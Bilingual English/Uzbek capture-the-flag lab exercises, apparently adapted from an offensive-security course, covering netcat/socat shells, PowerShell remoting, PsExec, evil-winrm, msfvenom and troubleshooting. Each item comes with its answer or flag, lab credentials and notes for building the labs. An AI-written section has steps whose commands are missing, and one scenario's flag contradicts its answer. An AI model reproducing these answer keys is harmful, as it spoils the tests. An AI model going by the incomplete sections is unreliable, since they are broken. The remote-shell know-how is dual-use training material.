Listen for a Netcat shell on port 567. The flag will be in the /nc directory.
567-portda Netcat qobig‘ini tinglang. Flag `/nc` jildida bo‘ladi.
Javob: NC{I_Offfer_My_Shell_As_Tribute} | NC{Men_Shellni_Hurmat_Sifatida_Taqdim_Etaman}
Senary
nc orqali 567 portga bog’lanish qiligandan so’ng flag chiqishi kerak bo’ladi.
14.2.8
1
To begin this set of exercises, SSH into the exercise host with offensive:security. The IP will be displayed when the host is started.
For example, ssh offensive@192.168.50.22 (security is the password)
After the initial SSH connection, establish another SSH connection from the exercise host to 172.16.53.10 with root:root.
ssh root@172.16.53.10
Make a SOCAT connection with 172.16.53.20 on port 555. The flag will be displayed after pressing the ENTER key in the connection.
Ushbu mashqlarni boshlash uchun, `haady:security` foydalanuvchi ma’lumotlari bilan mashq hostiga SSH orqali kiring. Host ishga tushirilganda IP ko‘rsatiladi.
Misol uchun:
`ssh haady@192.168.50.22` (parol: `security`)
Dastlabki SSH ulanishidan keyin, mashq hostidan `172.16.53.10` IP-manzilga `root:root` bilan yana bir SSH ulanishini o‘rnating.
ssh root@172.16.53.10
`172.16.53.20` IP-manzilda 555-portga SOCAT ulanishini o‘rnating. Ulanishda ENTER tugmasini bosgandan so‘ng flag ko‘rsatiladi.
Javob: SOCAT{Connected_With_SOCAT} | SOCAT{SOCAT_Bilan_Ulanish_Tuzilgan}
Senary
ssh bilan birinchi ipga ulanadi va undan so’ng uni ichda yana boshqa ipga ssh bilan ulanishi kerak root orqali
va Socat orqali 172.16.53.20 shu ipni 555 portiga ulanishi kerak va enter bosganidan song flagni olishi kerak.
2
Create a SOCAT listener on port 4444. The flag will be displayed when the remote host establishes a connection.
4444-portda SOCAT tinglovchisini yarating. Masofaviy host(mezbon) ulanishni o‘rnatganda flag ko‘rsatiladi.
Javob: SOCAT{TAG_You_Are_It!} | SOCAT{Endi_Sen_O‘yndasan!}
AI
Agar o'quvchilar socat -d -d TCP4-LISTEN:4444 STDOUT komandasini ishlatishlari kerak bo'lsa va flagni shu tarzda olishlari kerak bo'lsa, bu yerda qanday amalga oshirishni tushuntiraman.
1. SOCAT komandasini ishlatish
Quyidagi socat komandasidan foydalanishingiz kerak:
Bu komanda 4444-portda TCP tinglovchini yaratadi va ulanishni kutadi. Ulanish o‘rnatilganda, flagni STDOUTga (ya'ni ekranga) chiqaradi.
2. Flagni Qo'shish
Flagni faqat bir marta ko'rsatish uchun quyidagi variantni ishlatish mumkin:
3. SOCAT'da Flagni Ko'rsatish
Agar flagni flag.txt faylida saqlamoqchi bo'lsangiz va socat orqali ulanishni kutayotgan bo'lsangiz, siz cat komandasidan foydalanib flagni ekranga chiqarishingiz mumkin.
4. O'quvchilarga Qo'llanma
O'quvchilarga qanday ulanishni tushuntirish uchun quyidagicha yo‘l-yo'riq berishingiz mumkin:
5. Sinovdan O'tkazish
6. O'quvchilar Uchun Docker Konteyneri (Agar Docker ishlatish bo'lsa)
Agar siz Docker konteyneridan foydalansangiz, yuqoridagi socat komandasini Dockerfile ichiga joylashtirishingiz mumkin:
Keyin, Docker konteynerini qurib, ishga tushirasiz:
Xulosa
Shu tarzda, o'quvchilar 4444-portda ulanishni amalga oshirib, SOCAT orqali flagni ko'rishlari mumkin.
3
Establish a shell connection with SOCAT with 172.16.53.20 on port 456. The flag will be in the current working directory after the connection is made.
Hint: It's not always necessary to use the EXEC option
SOCAT yordamida 172.16.53.20 IP-manzilda 456-portga qobiq ulanishini o‘rnating. Ulanish o‘rnatilgandan so‘ng flag joriy ishchi jildda paydo bo‘ladi.
Yordam: EXEC opsiyasidan foydalanish har doim ham zarur emas.
Javob: SOCAT{Bind_With_SOCAT} | SOCAT{SOCAT_Bilan_Bog‘landim}
Senary
ip ni 456 portiga SOCAT orqali ulanganidan so’ng quydagi filelar bo’ladi ichida va SOCAT-Flag-456.txt file ham bo’ladi va uni o’qigandan so’ng flag beriladi.
4
Start a shell listener with SOCAT on port 567. The flag will be in the current working directory after the connection is made.
SOCAT yordamida 567-portda shell listener(qobiq tinglovchisi)ni ishga tushiring. Ulanish o'rnatilgandan so'ng flag(bayroq) joriy jildda bo'ladi.
Javob: SOCAT{Here_You_Go!} | SOCAT{Mana_Senga!}
Senary
14.2.9
1
SSH into the exercise host on port 2222 with the following credentials: offensive:security The flag located in the offensive account's home directory is the answer.
SSH orqali 2222-portda mashq hostiga quyidagi login ma'lumotlari bilan kiring: offensive:security, bayroq offensive hisobining home jildida joylashgan va javob shudir.
Javob: SSH{NonDefault_Access} | SSH{Noodatiy_Kirish}
Senary
14.3.1
1
What needs to be enabled for PowerShell remote commands to work? (Enter the letter corresponding to the answer)
A. PowerCLI
B. Netcat
C. PSRemoting
D. RemotePS
PowerShell masofaviy buyruqlari ishlashi uchun nima yoqilgan bo'lishi kerak? (Javobga mos keladigan harfni kiriting)
A. PowerCLI
B. Netcat
C. PSRemoting
D. RemotePS
Javob: C. PSRemoting
2
What configuration setting needs to be added to before PowerShell remote shells work?
Hint: Even with PSRemoting enabled, this configuration change must be made.
PowerShell masofaviy qobiqlari ishlashi uchun qaysi konfiguratsiya sozlamasi qo'shilishi kerak?
Yordam: PSRemoting yoqilgan bo‘lsa ham, ushbu konfiguratsiyaga o‘zgartirish kiritilishi kerak.
Javob: TrustedHosts
3
True/False: The configurations need to be made on the remote host as well as the client.
Rost/Yolg'on: Konfiguratsiyalar masofaviy hostda ham, mijozda ham amalga oshirilishi kerak.
Javob: True
4
Which cmdlet is used to execute a single command on a remote host using PowerShell?
PowerShell yordamida masofaviy hostda bitta buyruqni bajarish uchun qaysi cmdlet ishlatiladi?
Javob: invoke-command
5
What cmdlet is used to establish a PowerShell shell to the remote host?
Masofaviy hostga PowerShell qobig'ini o'rnatish uchun qaysi cmdlet ishlatiladi?
Javob: enter-pssession
6
For the following exercise, rdesktop from your Kali host to the host ending in .79 with offsec:offsec.
Establish a remote PowerShell shell to the host ending in .80 with offensive:security. The flag will be in the offensive's home directory when the task is complete. The flag may take up to one minute to appear.
Quyidagi mashq uchun Kali hostingizdan .79 bilan tugaydigan hostga rdesktop orqali ulanib, haadyN1:haad00 login ma'lumotlarini kiriting.
.80 bilan tugaydigan hostga haady:haad login ma'lumotlari yordamida masofaviy PowerShell qobiqni o'rnating. Vazifa tugallangandan so'ng, bayroq haadi hisobining home jildida bo'ladi. Bayroq paydo bo'lishi uchun bir daqiqagacha vaqt ketishi mumkin.
Javob: SHELLS{PSRemoting_for_Ease} | SHELLS{PSRemoting_Bilan_Qulaylik}
Senary
79 bilan tugaydian host orqali rdestop orqali ulanishi kerak windowsni paroli haady
va powershellni administrator orqali ulanib
14.3.2
1
How would we specify a target host with the psexec command? (Enter the letter corresponding to the answer)
A. -ComputerName
B. \\
C. -t
D. --target
psexec buyrug'i yordamida nishon hostni qanday ko'rsatamiz? (Javobga mos keladigan harfni kiriting)
A. -ComputerName
B. \\
C. -t
D. --target
Javob: B. \\
2
Which version of PsExec needs an interactive session to work?
PsExecning qaysi talqini interaktiv sessiya talab qiladi?
Javob: 2.32
3
True/False: To establish a remote interactive session using psexec, you must use the Windows shell command (cmd).
Rost/Yolg'on: psexec yordamida masofaviy interaktiv sessiya o'rnatish uchun Windows qobiq buyrug'i (cmd) dan foydalanishingiz kerak.
Javob: False
4
Establish a remote shell with the cmd command to the host ending in .80 (offensive:security) from the Windows client ending in .79 (offsec:offsec). When this is completed, a flag will be in the C:\Users\offensive directory. The flag may take up to one minute to appear.
Windows mijozingizdan (.79, haad:haad) cmd buyrug'i yordamida .80 bilan tugaydigan hostga (offensive:security) masofaviy qobiq o'rnating. Bu tugallangandan so'ng, bayroq C:\Users\offensive jildida bo'ladi. Bayroq paydo bo'lishi uchun bir daqiqagacha vaqt ketishi mumkin.
Javob: SHELLS{Connected_With_PSEXec!} | SHELLS{PSEXec_Bilan_Ulandi!}
Senary
Yana windows orqali GUI ochiladi va powersheldan 80 bilan tugaydigan hostga ulanish kerak ko’rsatilgan manzildan flagni oladi.
Users\haady manzilida flag joylanishi kerak va yuqorida ko’rsatilgan file va folderlarni barchasi yaratilishi kerak. va fileni o’qigandan so’ng flag beriladi.
14.3.3
1
Which option is used with evil-winrm for the target host? (Enter the letter corresponding to the answer)
A. -i
B. --target
C. -ComputerName
D. \\\\
evil-winrm yordamida nishon hostni ko'rsatish uchun qaysi opsiya ishlatiladi? (Javobga mos keladigan harfni kiriting)
A. -i
B. --target
C. -ComputerName
D. \\
Javob: A. -i
2
To begin, ssh into the host that ends in .77 with offensive:security.
Establish an evil-winrm shell from the host ending with .77 to the host ending with .80 using evil:evil for the credentials. The flag will be in the C:\Users\evil\ directory. The flag may take up to one minute to appear.
Avvaliga haady:security login ma'lumotlari yordamida .77 bilan tugaydigan hostga SSH orqali kiring.
evil:evil login ma'lumotlarini ishlatib, .77 bilan tugaydigan hostdan .80 bilan tugaydigan hostga evil-winrm shell o'rnating. Bayroq C:\Users\evil\ jildida joylashgan bo'ladi. Bayroq paydo bo'lishi uchun bir daqiqagacha vaqt ketishi mumkin.
Javob: SHELLS{What_an_Evil_Remote_Shell} | SHELLS{Qanday_Yomon_Remote_Shell}
Senary
1 Haady bilan tizimga kiradi
evil-winrm file bo’ladi
uni ichida shu filelar bo’ladi
va boshqa ipga bog’lanadi evil-winrm orqali
va evil papkasiga o’tganda shu pastda ko’rsatilgan filelar bo’ladi va EvilRM_Flag.txt file ichiga flag bo’ladi.
14.4.1
1
What option is used to display the help menu for MSFvenom? (include the -)
MSFvenom uchun yordam menyusini ko‘rsatish uchun qaysi opsiya ishlatiladi? (- belgisini qo‘shing)
Javob: -h
2
What option is used to list all modules for a 'type'? (include the -)
Biror "type" uchun barcha modullarni ro'yxatlash uchun qaysi opsiya ishlatiladi? (- belgisini qo'shing)
Javob: —list
3
What is the 'type' that would fit the description of the kind of system that is being targeted? (For example: Cisco or Android)
Qaysi "type" nishonga olinayotgan tizimning tavsifiga mos keladi? (Masalan: Cisco yoki Android)
Javob: platforms
4
Which option is used to specify the format? (include the -)
Formatni belgilash uchun qaysi opsiya ishlatiladi? (- belgisini qo‘shing)
Javob: -f
5
Which kind of payload is this: windows/shell_reverse_tcp (staged or stageless)?
Bu qanday turdagi payload(yuklama): windows/shell_reverse_tcp (staged yoki stageless)?\
Javob: stageless
6
Which kind of payload is smaller? (staged or stageless)
Qaysi turdagi payload kichikroq? (staged yoki stageless)
Javob: Staged
7
True/False: All payloads used with MSFvenom will already be stable.
Rost/Yolg'on: MSFvenom bilan ishlatiladigan barcha yuklamalar allaqachon barqaror bo'ladi.
Javob: false | Noto'g'ri
8
True/False: A Windows payload will work the same on a Linux host.
Rost/Yolg'on: Windows yuklamasi Linux hostda ham xuddi shunday ishlaydi.
Javob: false | Noto'g'ri
9
Go through this section again and do the exercises demonstrated. Were you able to create and connect to the Linux host with your reverse shell? (yes/no)
Ushbu bo‘limni qayta ko‘rib chiqing va ko‘rsatilgan mashqlarni bajaring. Linux hostga reverse shell(teskari qobiq) yordamida ulanishni yaratish va ulanishga muvaffaq bo‘ldingizmi? (Ha/Yo’q)
Javob: Yes
10
Go through this section again and do the exercises demonstrated. Were you able to create and connect to the Windows host with your reverse shell? (yes/no)
Ushbu bo‘limni qayta ko‘rib chiqing va ko‘rsatilgan mashqlarni bajaring. Windows hostga reverse shell yordamida ulanishni yaratish va ulanishga muvaffaq bo‘ldingizmi?
Javob: Yes
15. Troubleshooting.
15.2.1.
1
When troubleshooting a specific issue, what should we do when the instructions don't align exactly with what we observe? (Enter the letter corresponding to the answer)
A. Ignore the instructions and keep looking for something that matches
B. Try to understand the underlying goals of the steps and relate them as they apply to our problem
C. Enter the commands exactly as shown in the guide and ignore error messages
D. Consider the problem unsolvable and give up
Muayyan muammoni hal qilishda, ko'rsatmalar aniq bo'lmaganda nima qilishimiz kerak? (Javobga mos keladigan harfni kiriting)
A. Ko'rsatmalarni e'tiborsiz qoldirib, mos keladigan biror narsani qidirishda davom etish
B. Bosqichlarning asosiy maqsadlarini tushunishga harakat qilib, ularni muammomizga qanday qo'llashni aniqlash
C. Ko'rsatmalarda ko'rsatilganidek buyruqlarni to'liq kiritish va xatolik xabarlarini e'tiborsiz qoldirish
D. Muammoni hal qilinmas deb hisoblab, taslim bo'lish
Javob: B
2
If a guide shows a single network interface in the scenario, that has the name "enp0s3," what interface would that correspond to on our Linux system? (Enter the letter corresponding to the answer)
A. eth0
B. enp0s3
C. Our primary network interface
D. wlan0
Hint: Our system may not always be configured the same way, so looking at what our system is configured with is important.
Agar qo‘llanmada "enp0s3" deb nomlangan bitta tarmoq interfeysi ko‘rsatilgan bo‘lsa, bu interfeys bizning Linux tizimimizda qaysi interfeysga mos keladi? (Javobga mos keladigan harfni kiriting)
Yordam: Bizning tizim har doim bir xil tarzda sozlanmagan bo'lishi mumkin, shuning uchun tizimimiz qanday sozlanganini tekshirish muhimdir.
A. eth0
B. enp0s3
C. Bizning asosiy tarmoq interfeysimiz
D. wlan0
Javob: C
3
Your job is to get a web server up and running. As you searched how to do this, you came across these instructions. Using your troubleshooting skills, follow these instructions on the exercise host. The flag will be in the offsec home directory when the tasks are completed successfully. If a lock error comes up, run 'sudo kill -9 PID', replacing "PID" with the process ID shown in the error message.
A. Install the lighttpd package by entering "yum install httpd."
B. Modify the configuration file (/etc/lighttpd/lighttpd.conf) to match the following:
server.modules = (
"mod_indexfile",
"mod_access",
"mod_alias",
"mod_redirect",
"mod_accesslog",
)
server.document-root = "/var/www/html"
server.upload-dirs = ("/var/cache/lighttpd/uploads" )
server.errorlog = "/var/log/lighttpd/error.log"
server.pid-file = "/run/lighttpd.pid"
server.username = "www-data"
server.groupname = "www-data"
server.port = 80
accesslog.filename = "/var/log/lighttpd/access.log"
--- Trimmed ---
C. Start the web service by entering "systemctl lighttpd start."
D. Check the IP of the host by entering "ifconfig eth0"
E. Open a browser and enter the IP in the URL box on your Kali host to verify the service is working.
Hint: The instructions are not correct, except for B. Work with the intent of the instructions to complete the desired goal.
Tarmoq serverini ishga tushirishingiz kerak. Ushbu ko'rsatmalarni kuzatib, mashqlar hostida ishlang. Agar vazifalar muvaffaqiyatli bajarilsa, flag haad home katalogida bo'ladi. Agar "lock error" paydo bo‘lsa, xatodagi jarayon ID'sini "PID" o‘rniga qo‘yib, sudo kill -9 PID buyrug‘ini bajaring.
A. yum install httpd buyrug‘i yordamida lighttpd paketini o‘rnating.
B. /etc/lighttpd/lighttpd.conf konfiguratsiya faylini quyidagiga mos ravishda tahrir qiling:
server.modules = (
"mod_indexfile",
"mod_access",
"mod_alias",
"mod_redirect",
"mod_accesslog",
)
server.document-root = "/var/www/html"
server.upload-dirs = ("/var/cache/lighttpd/uploads")
server.errorlog = "/var/log/lighttpd/error.log"
server.pid-file = "/run/lighttpd.pid"
server.username = "www-data"
server.groupname = "www-data"
server.port = 80
accesslog.filename = "/var/log/lighttpd/access.log"
C. systemctl lighttpd start buyrug‘i bilan veb-xizmatni ishga tushiring.
D. Host IP manzilini bilish uchun ifconfig eth0 buyrug‘ini bajaring.
E. Kali hostingizdagi brauzerni ochib, URL qutisiga IP-manzilni kiriting va xizmatning ishlashini tekshiring.
Hint: Ko'rsatmalar to'g'ri emas, faqat B javob to'g'ri. Ko'rsatmalarning muddaosini tushunib, kerakli maqsadga erishish uchun ularga mos ravishda ishlang.
Javob: TROUBLESHOOT{Bu_juda_ko'p_noto'g'ri_qadamlar_edi_lekin_baribir_hal_qildik}
Senary
Bu CTF (Capture The Flag) vazifasida sizning maqsadingiz web serverni ishga tushirish va uni to'g'ri sozlash orqali flag (bayroq) ni topishdir. Flag odatda serverning ma'lum bir joyida (masalan, /home/haad/ katalogida) saqlanadi.
Bu senariy o'quvchilarga web server sozlash, xatolarni tuzatish va flag ni topish vazifalarini bajarish orqali ko'nikmalarini oshirishga yordam beradi. Senariy quyidagi qismlardan iborat:
---
### **CTF Senaryosi: Web Server Sozlash va Flag ni Topish**
#### **CTF Nomi:** "Web Serverni Ishga Tushirish" #### **Maqsad:** O'quvchilar `lighttpd` web serverini to'g'ri sozlash, xatolarni tuzatish va flag ni topish orqali asosiy server boshqarish ko'nikmalarini o'rganishadi. #### **Flag Joyi:** `/home/offsec/flag.txt` faylida saqlangan. #### **Qiyinlik Darajasi:** Boshlang'ich/O'rta.
---
### **1. Kirish (O'quvchilar uchun ko'rsatma)**
**Salom, CTF ishtirokchisi!** Sizning vazifangiz `lighttpd` web serverini ishga tushirish va uni to'g'ri sozlash orqali flag ni topish. Flag `/home/offsec/flag.txt` faylida saqlangan. Quyidagi ko'rsatmalarga amal qiling, lekin diqqatli bo'ling, chunki ba'zi ko'rsatmalar noto'g'ri bo'lishi mumkin. Xatolarni topish va tuzatish orqali vazifani bajaring.
---
### **2. Ko'rsatmalar (Ataylab Noto'g'ri Ko'rsatmalar)**
1. **Web Serverni O'rnatish:** ```bash yum install httpd ``` (Noto'g'ri: Bu Apache ni o'rnatadi, `lighttpd` kerak.)
2. **Konfiguratsiya Faylini Sozlash:** `/etc/lighttpd/lighttpd.conf` faylini quyidagicha sozlang: ```plaintext server.modules = ( "mod_indexfile", "mod_access", "mod_alias", "mod_redirect", "mod_accesslog", ) server.document-root = "/var/www/html" server.upload-dirs = ("/var/cache/lighttpd/uploads" ) server.errorlog = "/var/log/lighttpd/error.log" server.pid-file = "/run/lighttpd.pid" server.username = "www-data" server.groupname = "www-data" server.port = 80
accesslog.filename = "/var/log/lighttpd/access.log" ``` (To'g'ri: Bu qism to'g'ri, lekin o'quvchilar faylni tahrirlashni o'rganishlari kerak.)
3. **Web Serverni Ishga Tushirish:** ```bash systemctl lighttpd start ``` (Noto'g'ri: To'g'ri buyruq `systemctl start lighttpd`.)
4. **Serverning IP Manzilini Tekshirish:** ```bash ifconfig eth0 ``` (To'g'ri: Bu qism to'g'ri, lekin `eth0` interfeysi mavjud bo'lmasa, `ip a` buyrug'idan foydalanish kerak.)
5. **Brauzerda Tekshirish:** Olingan IP manzilini brauzerga kiriting va web server ishlayotganligini tekshiring.
---
### **3. Xatolarni Tuzatish (O'quvchilar uchun yechim)**
1. **Web Serverni To'g'ri O'rnatish:** ```bash yum install lighttpd ``` Agar `yum` ishlamasa, `dnf` dan foydalaning: ```bash dnf install lighttpd ```
2. **Web Serverni To'g'ri Ishga Tushirish:** ```bash systemctl start lighttpd ```
3. **Port Band Bo'lsa:** Agar port band bo'lsa, quyidagi buyruq orqali jarayonni to'xtating: ```bash sudo kill -9 PID ``` (PID ni xato xabarida ko'rsatilgan raqam bilan almashtiring.)
4. **IP Manzilini Tekshirish:** Agar `ifconfig eth0` ishlamasa, quyidagi buyruqdan foydalaning: ```bash ip a ```
5. **Flag ni Topish:** Web server to'g'ri ishlagandan so'ng, flag ni `/home/offsec/flag.txt` faylida toping: ```bash cat /home/offsec/flag.txt ```
---
### **4. Flag va Yutuq**
- **Flag:** Agar hamma qadamlarni to'g'ri bajarsangiz, flag quyidagicha bo'ladi: ```plaintext CTF{web_server_is_ready} ```
- **Yutuq:** Flag ni topganingiz uchun siz "Web Server Sozlash Mutaxassisi" unvoniga sazovor bo'ldingiz!
---
### **5. Qo'shimcha Maslahatlar (Tashkilotchi uchun)**
1. **Virtual Mashina yoki Docker:** O'quvchilar uchun virtual mashina yoki Docker konteyneri tayyorlang. Misol uchun, `lighttpd` ni o'z ichiga olgan Docker konteyneri yarating: ```bash docker run -it --name lighttpd-ctf -p 80:80 ubuntu ```
2. **Qo'llanma va Ko'rsatmalar:** O'quvchilarga qisqa qo'llanma va ko'rsatmalar tarqating. Ular qanday qilib virtual mashinaga ulanish yoki Docker konteynerini ishga tushirishni bilishlari kerak.
3. **Ballar va Sovrinlar:** Har bir to'g'ri tuzatilgan xato uchun ballar belgilang. Misol uchun: - `lighttpd` ni to'g'ri o'rnatish: 50 ball. - Konfiguratsiya faylini to'g'ri sozlash: 50 ball. - Serverni to'g'ri ishga tushirish: 50 ball. - Flag ni topish: 50 ball.
4. **Feedback:** CTF tugagandan so'ng, o'quvchilardan feedback oling va ularning tajribalarini baholang.
---
### **6. Namuna CTF Strukturasi**
``` CTF_Web_Server/ │ ├── README.txt (O'quvchilar uchun ko'rsatma) ├── flag.txt (Flag fayli, /home/offsec/ katalogiga joylashtiriladi) ├── lighttpd.conf (Namuna konfiguratsiya fayli) ├── start.sh (Docker konteynerini ishga tushirish skripti) └── hints.txt (Qo'shimcha maslahatlar, agar o'quvchilar qiynalsa) ```
---
### **7. Docker Konteyneri uchun Namuna Skript**
Agar Docker dan foydalansangiz, quyidagi skript orqali konteynerni ishga tushirishingiz mumkin:
```bash # start.sh docker run -it --name lighttpd-ctf -p 80:80 ubuntu apt update apt install -y lighttpd echo "CTF{web_server_is_ready}" > /home/offsec/flag.txt service lighttpd start
15.3.1
1
What is the first thing we should do when having an issue executing a program? Enter the letter corresponding to the answer.
A. Look at the error message(s)
B. Add a missing semicolon
C. Change programming languages
D. Ask the closest senior engineer
Dastur bajarilishida muammo yuzaga kelganda birinchi navbatda nima qilishimiz kerak? Javobga mos keladigan harfni kiriting.
A. Xato xabarlari (error message) ni ko'rib chiqish
B. Yo‘qolgan nuqta-vergulni qo‘shish
C. Dasturlash tilini o‘zgartirish
D. Eng yaqin katta muhandisdan so‘rash
Javob: A
2
Without type casting, can an integer and a string be concatenated in Python (yes/no)?
Tur o'zgartirish(type casting)siz, Pythonda butun son (integer) va satrni (string) birlashtirish mumkinmi (ha/yo'q)?
Javob: yo'q
3
What is the word for the set of rules that defines the combinations of symbols that are considered to be correctly structured statements or expressions in a programming language? (Google is your friend)
Hint: A lot of programming errors are the result of the incorrect ______.
Dasturlash tilida to‘g‘ri tuzilgan bayonotlar yoki ifodalar deb hisoblanadigan belgilarning birikmalarini aniqlovchi qoidalar to‘plami qanday ataladi?(Google va ChatGPT yordam berishi mumkin)
Yordam: Ko‘plab dasturlashdagi xatoliklar noto‘g‘ri ______ natijasidir.
Javob: syntax
4
All programming languages follow basic logic flows. (True/False)
Barcha dasturlash tillari asosiy mantiqiy oqimlarni qo'llaydi. (To’g’ri/Noto’g’ri)
Javob: To'g'ri
5
All programs have the same syntax rules. (True/False)
Barcha dasturlar bir xil sintaksis qoidalariga ega. (To’g’ri/Noto’g’ri)
Javob: Noto'g'ri
6
To get started, ssh into the exercise host with "offsec:offsec".
Debug the program in /home/offsec/CrazyCode/ to get the flag. Changing the code will result in the flag being different. Be sure not to add/subtract components of the code that will cause the logic to break.
Hint: If you don't receive any errors and still don't get the flag, be sure to inspect the code and determine how the flag should be displayed.
The comment that the line is valid should not be altered. The mod keyword argument must remain unaltered for the script to work properly. The pow() function was changed slightly between versions of Python.
Boshlash uchun, "offsec:offsec" login ma'lumotlari yordamida mashq hostiga SSH orqali kiring.
/home/offsec/CrazyCode/ katalogidagi dasturda xatolarni tuzatib, flagni oling. Kodni o'zgartirish flagning boshqa bo'lishiga olib keladi. Mantiqni buzadigan kod qismlarini qo'shmaslik yoki olib tashlamaslikka ishonch hosil qiling.
Hint: "Agar xatoliklar olmasangiz va bayroq hali ham ko‘rinmasa, kodni tekshirib chiqing va bayroq qanday ko‘rsatilishi kerakligini aniqlang.
Kodning to‘g‘riligini tasdiqlovchi izohni o‘zgartirmang. Skriptning to‘g‘ri ishlashi uchun `mod` kalit so‘z argumenti o‘zgarmasdan qolishi kerak. `pow()` funksiyasi Python talqinlari orasida biroz o‘zgargan."
Javob: TROUBLESHOOT{Kimdir_Mening_Spagettimga_Tegdi!}
senary
Foydalanuvchi tizimga haad:haad credentials bilan kiradi. /home/haad/CrazyCode/ forder ichida, file ishida shu (⬆️) code bo`ladi. Agar foydalanuvchi hamma xatoni to`g`irlasa, Flag beriladi.
Flag o`zbek tilida bo`lishi kerak. Uning uchun siz code algorith’ni tushunib keyin 9-25 qatorlarini o`zgartirasiz!
15.4.1
1
What is the first step we should take when trying to compile exploit code?
A. Compile it with built-in tools
B. Type the error code in a search engine
C. Review the code to observe if it will harm us or our machine when compiled
D. Turn off the computer and turn it back on again
Eksploit kodini kompayl qilishga harakat qilganda birinchi navbatda qanday qadamni qo‘yishimiz kerak?
A. Uni ichki vositalar bilan kompayl qilish
B. Xato kodini qidiruv tizimiga kiritish
C. Kompayl qilinganda bizga yoki qurilmamizga zarar yetkazishi mumkinmi, deb kodni ko'rib chiqish
D. Kompyuterni o‘chirib, qayta yoqish
Javob: C
2
When code doesn't compile correctly, what is the first thing we should try?
A. Add a semicolon to the end of the main statements
B. Type the error code in a search engine
C. Call a friend
D. Remove lines of code that seem strange
Kod to'g'ri kompayl qilinmaganda, birinchi navbatda nima qilishimiz kerak?
A. Asosiy operatorlarning oxiriga nuqta-vergul qo'shish
B. Xato kodini qidiruv tizimiga kiritish
C. Do'stga qo'ng'iroq qilish
D. G'alati ko'ringan kod qatorlarini olib tashlash
Javob: B
3
Sometimes a library isn't available on the host when we are compiling the code. What can we do in this case?
A. Install a package that contains the library file
B. Delete the code
C. Choose a different language and rewrite the program from scratch
D. Walk away knowing this issue is impossible to fix
Ba'zida kodni kompayl qilishda hostda kutubxona mavjud bo'lmaydi. Bunday holatda nima qilishimiz mumkin?
A. Kutubxona faylini o‘z ichiga olgan paketni o‘rnatish
B. Kodni o‘chirib tashlash
C. Boshqa tilni tanlab, dasturiy ta'minotni boshqatdan yozish
D. Ushbu muammoni hal qilib bo'lmasligini bilib, ishimizdan voz kechish
Javob: A
4
Mistakes while coding happen often. What is the quickest way to identify where there may be a syntax error in the code?
A. Review the program line by line
B. Research the issue we think is happening
C. The error is always on line 42
D. Read the error message and look for the reported line number the issue is found
Kod yozishda xatolar tez-tez sodir bo'ladi. Koddagi sintaksis xatosi qayerda bo'lishi mumkinligini aniqlashning eng tezkor usuli qanday?
A. Dasturni qatorma-qator ko'rib chiqish
B. Biz sodir bo‘lyapti deb o‘ylagan muammoni o‘rganish
C. Xato har doim 42-qatorda bo‘ladi
D. Xato xabarini o‘qish va muammo aniqlangan qator raqamini izlash
Javob: D
5
To get started, ssh into the exercise host with "offsec:offsec".
5.From there, navigate into the BrokenCompile directory and attempt to compile the c code with the following command: "gcc -Wall -o test CompileMe.c -lcrypto -lssl." Troubleshoot the issues until you can successfully compile the code. When the problems are resolved, the flag will be in the /home/offsec directory. If a lock error comes up, run 'sudo kill -9 PID', replacing "PID" with the process ID shown in the error message.
Hint: The offsec has sudo privileges for a couple of commands that may help resolve the issue on the host.
Boshlash uchun "Haad:Haad" login ma'lumotlari yordamida mashq hostiga SSH orqali kiring.
5. Shundan so'ng, **BrokenCompile** katalogiga o'ting va quyidagi buyruq bilan C kodni kompayl qilishga harakat qiling:
`gcc -Wall -o test CompileMe.c -lcrypto -lssl`
Muammolarni hal qilguningizcha xatolarni tuzatib boring. Muammolar hal qilingach, bayroq **/home/offsec** katalogida bo‘ladi. Agar "lock error" yuzaga kelsa, xatolik xabarida ko'rsatilgan jarayon IDsini "PID" o'rniga qo'yib, quyidagi buyruqni bajaring:
`sudo kill -9 PID`
Yordam: **Haad** hisobida hostdagi muammoni hal qilishga yordam berishi mumkin bo‘lgan bir nechta buyruqlar uchun sudo imtiyozlari mavjud.
Javob: TROUBLESHOOT{W3_G0tz_Th3_L1b}
Senary
Foydalanuvchi tizimga haad:haad credentials bilan kiradi. /home/haad/BrokenCompile/ forder ichida, CompileMe.c file ishida shu (⬆️) code bo`ladi. Agar foydalanuvchi hamma xatoni to`g`irlasa, Flag beriladi.
1. Serverga bazi tool’lar bo`lmaydi bo`lmaydi. haad user’ga buni ko`chirish uchun huquq berilishi kerak
2. Foydalanuvchi code’dagi syntax xatolarni to`g`irlagandan so`ng, gcc -Wall -o test CompileMe.c -lcrypto -lssl bilan code’ni compile qiladi. Agar muvaffaqiyatli bo`lsa /home/haad/FLAG degan file paydo bo`ladi
15.5.1
1
When diagnosing a network issue, what is the first step that should be taken? (Enter the letter corresponding to the answer)
A. Reboot the computer
B. Check if all of the cables are plugged in correctly
C. Run ipconfig to determine the IP address
D. ping
Tarmoq muammosini tashxislashda birinchi navbatda qaysi qadamni qo‘yish kerak? (Javobga mos keladigan harfni kiriting)
A. Kompyuterni qayta yoqish
B. Barcha kabellar to‘g‘ri ulanganligini tekshirish
C. IP manzilni aniqlash uchun ipconfig buyrug‘ini bajarish
D. `ping google.com` buyrug‘ini bajarish
Javob: B
2
If there is power going to a computer and all cables are connected properly, what is a good question to ask when having a network problem? (Enter the letter corresponding to the answer)
A. What changed since the last time this was working?
B. Is there a problem with my hard drive?
C. Are the cables plugged in correctly?
D. Is the processor working?
Agar kompyuterga elektr energiyasi kelayotgan bo‘lsa va barcha kabellar to‘g‘ri ulangan bo‘lsa, tarmoq muammosi yuzaga kelganda qanday savol berish maqsadga muvofiq bo‘ladi? (Javobga mos keladigan harfni kiriting)
A. Oxirgi marta ishlatilganidan beri nima o‘zgardi?
B. Qattiq diskda muammo bormi?
C. Kabellar to‘g‘ri ulanganmi?
D. Protsessor ishlayaptimi?
Javob: A
3
A statically configured IP can cause a computer to lose internet connectivity. (True/False)
Statik(turg'un) tarzda sozlangan IP kompyuterning internetga ulanishini yo'qotishiga olib kelishi mumkin. (To’g’ri/Noto’g’ri)
Javob: To'g'ri
4
Which of the following is the issue if a computer can reach a website by IP but not name? (Enter the letter corresponding to the answer)
A. Routing
B. The switch
C. DNS
D. The network interface card (NIC)
Agar kompyuter IP orqali veb-saytga ulana olsa, lekin nomi bo‘yicha ulana olmasa, quyidagilardan qaysi biri muammo bo‘lishi mumkin? (Javobga mos keladigan harfni kiriting)
A. Yo‘naltirish (Routing)
B. Switch
C. DNS
D. Tarmoq interfeysi kartasi (NIC)
Javob: C
5
If the computer can reach the internet and other hosts but not a specific internal host, what may be the problem? (Enter the letter corresponding to the answer)
A. Routing
B. The switch
